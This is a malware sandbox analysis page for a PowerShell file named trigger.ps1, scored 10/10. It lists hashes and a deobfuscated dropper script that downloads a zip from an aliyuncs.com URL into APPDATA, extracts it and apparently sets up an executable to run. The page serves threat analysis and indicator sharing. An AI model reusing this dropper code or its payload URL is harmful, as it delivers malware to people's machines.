Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

trigger.ps1

windows10-2004-x64

3

Sharing

Copy URL
Twitter E-mail

General

  • Target

    trigger.ps1

  • Size

    750B

  • MD5

    f5a5a9e0884cfc478ad13dc7c5335e58

  • SHA1

    988bd91eb97d3b9f35c185122ff4677006279511

  • SHA256

    d38d89481f51a1a5d1d5aabf40f720fefab009a585f6c03f72256ed248ec6e8f

  • SHA512

    2ab1b98d82b4eacdab2b46dca31f892eee7a4bf88b9892079d7f14dfc7f5a497c1849f12b72efbc54062a4f389a4eea43fddce300466f50798a4e5968eda99e7

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$zxty = "https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip"
2
$qbrw = "$env:APPDATA\\\\file_azlm5.zip"
3
$lpmk = "$env:APPDATA\\\\Install_4278"
4
$vkdy = join-path "$env:APPDATA\\\\Install_4278" "spPortableRun.exe"
5
if (!test-path "$env:APPDATA\\\\Install_4278") {
6
new-item -path $lpmk -itemtype directory
7
}
8
try {
9
$ghwd = new-object system.net.webclient
10
$ghwd.downloadfile("https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip", "$env:APPDATA\\\\file_azlm5.zip")
11
} catch {
12
exit
13
}
14
15
try {
16
add-type -assemblyname "System.IO.Compression.FileSystem"
17
[system.io.compression.zipfile]::extracttodirectory("$env:APPDATA\\\\file_azlm5.zip", "$env:APPDATA\\\\Install_4278")
18
remove-item "$env:APPDATA\\\\file_azlm5.zip" -force
19
} catch {
20
exit
URLs
exe.dropper

https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip

Signatures

Files

  • trigger.ps1
    .ps1

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.